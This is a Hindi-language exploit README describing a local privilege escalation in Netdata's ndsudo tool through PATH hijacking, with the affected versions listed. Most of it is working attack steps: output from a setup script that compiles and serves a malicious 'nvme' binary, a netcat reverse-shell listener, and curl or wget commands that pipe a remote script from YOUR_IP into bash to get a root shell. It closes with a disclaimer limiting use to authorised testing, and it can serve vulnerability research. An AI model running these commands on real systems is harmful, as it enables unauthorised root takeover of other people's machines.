
"ndsudo" (Netdata स्थानीय शोषण) के माध्यम से विशेषाधिकार वृद्धि के लिए Bash स्क्रिप्ट
Bash स्क्रिप्ट जो "ndsudo" (Netdata स्थानीय शोषण) के माध्यम से विशेषाधिकार वृद्धि के लिए है।
>= v1.45.0, < v1.45.3
>= v1.44.0-60, < v1.45.0-169
ndsudo उपकरण बाहरी आदेशों का एक प्रतिबंधित सेट चलाता है, लेकिन खोज पथ "PATH" पर्यावरण चर द्वारा प्रदान किए जाते हैं।
हमारे पास पहुंच वाले पथ पर "PATH" पर्यावरण चर को बदलकर, हम नियंत्रित कर सकते हैं कि ndsudo कमांड को कहाँ खोजे और एक मैलिशियस कोड वाला कमांड बना सकते हैं।
यह शोषण इस धारणा पर आधारित है कि लक्ष्य मशीन और हमलावर मशीन एक ही नेटवर्क पर हैं।
हम "setup_exploit_server.sh" चलाकर हमले के लिए आवश्यक फ़ाइल स्वचालित रूप से उत्पन्न और तैनात कर सकते हैं
$ ./setup_exploit_server.sh YOUR_IP
--------- Exploit Infrastructure Setup by Ottanta ---------
[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444
Press Enter to stop the web server and clean up...
यह स्क्रिप्ट आपके आईपी पते के साथ कॉन्फ़िगर की गई हमले के लिए आवश्यक सभी फ़ाइलें बनाएगी।
अपना वेब सर्वर तैनात करने के बाद हम दूसरे शेल पर एक श्रोता प्रारंभ करते हैं:
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...
हमारे HTTP क्लाइंट के आधार पर हम अपने शोषण को डाउनलोड और निष्पादित कर सकते हैं।
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
यदि सब कुछ सही ढंग से किया गया है तो हमारे पास अब एक रूट शेल होना चाहिए।

यह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।
लेखक इस जानकारी के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।